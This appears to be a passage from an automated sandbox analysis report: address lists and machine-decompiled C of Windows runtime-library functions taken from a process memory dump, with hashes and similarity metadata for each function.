0x0462fc41
0x0466bf17
0x0466bf19
0x0466bf48
0x0466bf4b
0x00000000
0x0466bf1b
0x0466bf22
0x0466bf24
0x0466bf26
0x00000000
0x0466bf2c
0x0466bf37
0x0466bf39
0x0466bf3b
0x00000000
0x0466bf41
0x0466bf41
0x0466bf41
0x0466bf41
0x0466bf45
0x00000000
0x0466bf45
0x0466bf3b
0x0466bf26
0x00000000
0x0462fc47
0x0462fc47
0x0462fc49
0x0462fcb2
0x0462fcb4
0x0462fcb6
0x0462fcdc
0x0462fcdc
0x00000000
0x0462fcb8
0x0462fcc3
0x0462fcc5
0x0462fcc7
0x00000000
0x0462fcc9
0x0462fcc9
0x0462fccd
0x00000000
0x0462fccd
0x0462fcc7
0x00000000
0x0462fc4b
0x0462fc4b
0x0462fc4e
0x0462fc4e
0x0462fc51
0x0462fc51
0x0462fc54
0x0462fc5a
0x0462fc5c
0x0462fc5f
0x0462fc61
0x0462fc63
0x0462fc65
0x0462fc67
0x0462fc6e
0x0462fc72
0x0462fc72
0x0462fc72
0x0462fc72
0x0462fc67
0x0462fc61
0x00000000
0x0462fc5a
0x0462fc49
0x0462fc41
0x0462fc30
0x0462fc27
0x0462fc03
0x0462fbcd
0x0462fbd3
0x0462fbd9
0x0462fbdc
0x0462fbde
0x0462fc99
0x0462fc9b
0x0462fc9d
0x0462fcd5
0x0462fcd5
0x0462fc89
0x0462fc89
0x00000000
0x0462fc9f
0x0462fc9f
0x0462fca3
0x00000000
0x0462fca3
0x00000000
0x0462fbe4
0x0462fbe4
0x0462fbe4
0x0462fbe4
0x0462fbe9
0x0462fbf2
0x00000000
0x0462fbf2
0x0462fbde
0x0462fbcb
0x0462fbab
0x0462fc8b
0x0462fc8b
0x0462fc8c
0x0462fb80
0x0462fb72
0x0462fb5e
0x0462fc8d
0x0462fc91
0x0462fadf
0x0462fadf
0x0462fae1
0x0462fae4
0x0462fae7
0x0462faec
0x0462faf8
0x0462fb00
0x0462fb07
0x0462fb0f
0x0462fb0f
0x0462fb07
0x00000000
0x0462faf8
0x0462fadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0466BE0F

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: d11f5778a7d720234ce7558b7f0b4036c51e529b5d84701cdefedd70da85307e
Instruction ID: d1cdbbfc2c4a60eaf4f84f73dfe84e7e40c3dc0cbf9af1bf5b97512aeb6d3e90
Opcode Fuzzy Hash: d11f5778a7d720234ce7558b7f0b4036c51e529b5d84701cdefedd70da85307e
Instruction Fuzzy Hash: F6A1E271B00A26EBEB29DF65C550B6BB3B4AB44B15F04456EE906DB790FB30F8019F80

Uniqueness

Uniqueness Score: -1.00%

Function 045F2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E045F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x46e5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x46e7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E046397C0();
				}
				if( *0x46e79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x46e79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04621624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04617D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E0468FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04639520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E0462E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L0464DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x46e6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x46e6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04639980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E046395D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04617D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04617D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04677016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E0468FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x46e5350;
							if(_t109 != 0x46e5350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E0468FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04685720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}

0x045f2d8a
0x045f2d8a
0x045f2d92
0x045f2d96
0x045f2d9e
0x045f2da0
0x045f2da3
0x045f2da5
0x045f2da8
0x045f2dab
0x045f2db2
0x0464f9aa
0x0464f9ab
0x0464f9ae
0x0464f9ae
0x045f2db8
0x045f2dc2
0x0464f9b9
0x0464f9be
0x0464f9bf
0x0464f9bf
0x045f2dcf
0x0464f9c9
0x045f2dd5
0x045f2dd5
0x045f2dd5
0x045f2dde
0x045f2de1
0x045f2e70
0x045f2e72
0x045f2e72
0x045f2de7
0x045f2deb
0x045f2e7c
0x045f2e83
0x045f2e85
0x045f2e8b
0x045f2e8d
0x045f2e92
0x045f2e92
0x045f2e85
0x045f2df1
0x045f2df7
0x045f2df9
0x045f2df9
0x045f2dfc
0x045f2dff
0x045f2e02
0x00000000
0x045f2e05
0x045f2e0c
0x0464f9d9
0x045f2e12
0x045f2e12
0x045f2e12
0x045f2e1a
0x0464f9e3
0x0464f9e9
0x0464f9f0
0x0464f9f6
0x0464f9f8
0x0464f9f8
0x0464f9f0
0x045f2e23
0x0464fa02
0x0464fa03
0x0464fa05
0x0464fa06
0x00000000
0x045f2e29
0x045f2e29
0x045f2e2e
0x045f2e34
0x045f2e3e
0x00000000
0x00000000
0x045f2e44
0x045f2e47
0x045f2e4d
0x00000000
0x00000000
0x045f2e4f
0x045f2e54
0x00000000
0x00000000
0x045f2e5a
0x045f2e5f
0x045f2e9a
0x045f2ea4
0x045f2ea5
0x045f2ea8
0x045f2eaf
0x045f2eb2
0x045f2eb5
0x0464fae9
0x0464faeb
0x0464faed
0x0464faef
0x0464faf7
0x0464faf8
0x0464fafd
0x0464faff
0x0464fb04
0x0464fb04
0x0464faff
0x045f2ec0
0x045f2ec4
0x045f2ec6
0x045f2ec8
0x0464fb14
0x0464fb18
0x0464fb1e
0x0464fb21
0x0464fb21
0x045f2ece
0x045f2ece
0x045f2ece
0x045f2ed7
0x045f2e61
0x045f2e63
0x0464fa6b
0x0464fa71
0x0464fa76
0x0464fa78
0x0464fa8a
0x0464fa7a
0x0464fa83
0x0464fa83
0x0464fa8f
0x0464fa91
0x0464fa97
0x0464fa9d
0x0464faa4
0x0464faaa
0x0464faaf
0x0464fab1
0x0464fac3
0x0464fab3
0x0464fabc
0x0464fabc
0x0464fac8
0x0464facb
0x0464fadf
0x0464fadf
0x0464facb
0x0464faa4
0x0464fa91
0x045f2e6f
0x045f2e6f
0x045f2e5f
0x0464fa13
0x0464fa15
0x0464fa17
0x0464fa1f
0x0464fa21
0x0464fa22
0x0464fa25
0x0464fa28
0x0464fa2f
0x0464fa2f
0x0464fa2a
0x0464fa2a
0x0464fa2a
0x0464fa31
0x0464fa34
0x0464fa36
0x0464fa3c
0x0464fa3e
0x0464fa41
0x0464fa43
0x0464fa45
0x0464fa45
0x0464fa41
0x0464fa3c
0x0464fa4a
0x0464fa4f
0x0464fa51
0x0464fa53
0x0464fa56
0x0464fa5b
0x0464fa5e
0x00000000
0x0464fa5e
0x045f2e23

Strings

RTL: Re-Waiting, xrefs: 0464FA4A

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Re-Waiting
API String ID: 0-316354757
Opcode ID: e6d39ed6273fa7c1c2105b3cc69f7a968ba4b8d50698d6d215582397af8fd1e6
Instruction ID: c4a79c301f22475bddc3467cf5c02f3bfe52075a89da668bc1d9c276715756e0
Opcode Fuzzy Hash: e6d39ed6273fa7c1c2105b3cc69f7a968ba4b8d50698d6d215582397af8fd1e6
Instruction Fuzzy Hash: AD6103B1A00644EFEB25DF68D840B7E77A5FB84318F2406AAE6119B3C0F735B9419792

Uniqueness

Uniqueness Score: -1.00%

Function 046C0EA5, Relevance: 1.4, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E046C0EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E046BFF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E046C1074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04639730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E046BA80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E046BA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x46e8b04 >> 0x14) + (_v44 -  *0x46e8b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04617D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E046B138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04617D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E046AFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x46e8724 & 0x00000008) != 0) {
						E046B52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E046C15B5(0x46e8ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}

0x046c0eb7
0x046c0eb9
0x046c0ec0
0x046c0ec2
0x046c0ecd
0x046c105b
0x046c105b
0x046c1061
0x046c1066
0x046c1066
0x046c106b
0x046c1073
0x046c1073
0x046c0ed3
0x046c0ed6
0x046c0edc
0x046c0ee0
0x046c0ee7
0x046c0ef0
0x046c0ef5
0x046c0efa
0x046c0efc
0x046c0efd
0x046c0f03
0x046c0f04
0x046c0f06
0x046c0f07
0x046c0f09
0x046c0f0e
0x046c0f14
0x046c0f23
0x046c0f2d
0x046c0f34
0x046c0f34
0x046c0f14
0x046c0f52
0x00000000
0x00000000
0x046c0f58
0x046c0f73
0x046c0f74
0x046c0f79
0x046c0f7d
0x046c0f80
0x046c0f86
0x046c0fab
0x046c0fb5
0x046c0fc6
0x046c0fd1
0x046c0fe3
0x046c0fd3
0x046c0fdc
0x046c0fdc
0x046c0feb
0x046c1009
0x046c1009
0x046c1015
0x046c1027
0x046c1017
0x046c1020
0x046c1020
0x046c102f
0x046c103c
0x046c103c
0x046c1048
0x046c1050
0x046c1050
0x046c1055
0x00000000
0x046c1055
0x046c0f88
0x046c0f9e
0x046c0fa2
0x046c0fa9
0x00000000
0x00000000
0x00000000
0x046c0fa9
0x00000000

Strings

`, xrefs: 046C0F16

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 27f270bc5e1528031d23e56943e550fef864901e41f3d244ec67cbdacdd2ee65
Instruction ID: 4a4503dfaba2953efbd84298ab8ddc53cdf31a10f9ef35822dcc50bb60edcfcd
Opcode Fuzzy Hash: 27f270bc5e1528031d23e56943e550fef864901e41f3d244ec67cbdacdd2ee65
Instruction Fuzzy Hash: 2B51D0703043819FE324DF68D984B6BB7E5EBC5304F04492DF99687291EA70F846CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0462F0BF, Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0462F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04614120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04639830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04639990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E046395D0();
							goto L11;
						} else {
							_t109 = L04614620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0463F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E046395D0();
										L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x0462f0d3
0x0462f0d9
0x0462f0e0
0x0462f0e7
0x0462f0f2
0x0462f0f4
0x0462f0f8
0x0462f100
0x0462f108
0x0462f10d
0x0462f115
0x0462f116
0x0462f11f
0x0462f123
0x0462f124
0x0462f12c
0x0462f130
0x0462f134
0x0462f13d
0x0462f144
0x0462f14b
0x0462f152
0x0466bab0
0x0466bab0
0x0462f158
0x0462f158
0x0462f15a
0x0462f160
0x0462f165
0x0462f166
0x0462f16f
0x0462f173
0x0466baa7
0x0466baa7
0x0466baab
0x00000000
0x0462f179
0x0462f18d
0x0462f191
0x0466baa2
0x00000000
0x0462f197
0x0462f19b
0x0462f1a2
0x0462f1a9
0x0462f1af
0x0462f1b2
0x0462f1b6
0x0462f1b9
0x0462f1c4
0x0462f1d8
0x0462f1df
0x0462f1e3
0x0462f1eb
0x0462f1ee
0x0462f1f4
0x0462f20f
0x0466bab7
0x0466babb
0x0466bacc
0x0466bad1
0x0462f215
0x0462f218
0x0462f226
0x0462f22b
0x00000000
0x0462f22b
0x0462f1f6
0x0462f1f6
0x0462f1f9
0x0462f1fb
0x0462f1fb
0x0462f1f4
0x0462f191
0x0462f173
0x0462f152
0x0462f203

Strings

@, xrefs: 0462F124

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: e7c72814bb73c8b3d60ac021638827c042589556f8c92686e954799f3908e0ca
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 91515B71604710AFD321DF29C840A6BBBF8FF48714F008A2DF996976A0E7B4E954CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04673540, Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E04673540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x46ed360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04630BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04673706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0463FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04673540;
						E0463FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0464DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04680C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E046397C0();
					}
					return E0463B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04673971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04673884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0463FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04639650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04673787(_a4,  &_v352, _t80);
						}
					}
					L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E046395D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x04673552
0x0467355a
0x0467355d
0x04673566
0x04673567
0x0467357e
0x0467358f
0x046735a1
0x046735a5
0x0467366b
0x0467366b
0x0467366d
0x04673672
0x04673679
0x04673685
0x0467368d
0x0467369d
0x046736a7
0x046736b8
0x046736c6
0x046736c7
0x046736dc
0x046736e1
0x046736e7
0x046736e9
0x046736e9
0x04673703
0x04673703
0x046735b5
0x046735c0
0x046735c4
0x00000000
0x00000000
0x046735ca
0x046735d7
0x046735e2
0x046735e6
0x046735e8
0x046735f5
0x046735fa
0x04673603
0x04673604
0x04673609
0x0467360a
0x04673612
0x04673613
0x0467361e
0x04673622
0x04673628
0x0467362f
0x0467362f
0x04673636
0x04673638
0x0467363b
0x04673642
0x04673642
0x04673636
0x04673657
0x04673657
0x0467365c
0x04673662
0x04673669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0467358F

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: BinaryHash
API String ID: 2994545307-2202222882
Opcode ID: 0c60ed067e48122e20ed86d95745ba97f82835307065e28e9108b24b2186d51d
Instruction ID: 038ba266405fde2955e22e765b4d4e24e221aa233fd9c6eb6ae74a011dde9999
Opcode Fuzzy Hash: 0c60ed067e48122e20ed86d95745ba97f82835307065e28e9108b24b2186d51d
Instruction Fuzzy Hash: 444129F1D0156C9FEB21DA50CC80FDEB77CAB44718F0045A9EA0967250EB706E88DF99

Uniqueness

Uniqueness Score: -1.00%

Function 046C05AC, Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E046C05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E046C07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04639730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E046BA80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E046BA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E046C1293(_t79, _v40, E046C07DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04617D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E046B138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x046c05c5
0x046c05ca
0x046c05d3
0x046c06db
0x046c06db
0x046c06dd
0x046c06e3
0x046c06e3
0x046c05dd
0x046c05e7
0x046c05f6
0x046c0600
0x046c0607
0x046c0610
0x046c0615
0x046c061a
0x046c061c
0x046c061e
0x046c0624
0x046c0625
0x046c0627
0x046c0628
0x046c0631
0x046c0640
0x046c064d
0x046c0654
0x046c0654
0x046c0631
0x046c066d
0x046c0674
0x00000000
0x00000000
0x046c0692
0x046c069e
0x046c06b0
0x046c06a0
0x046c06a9
0x046c06a9
0x046c06b8
0x046c06d6
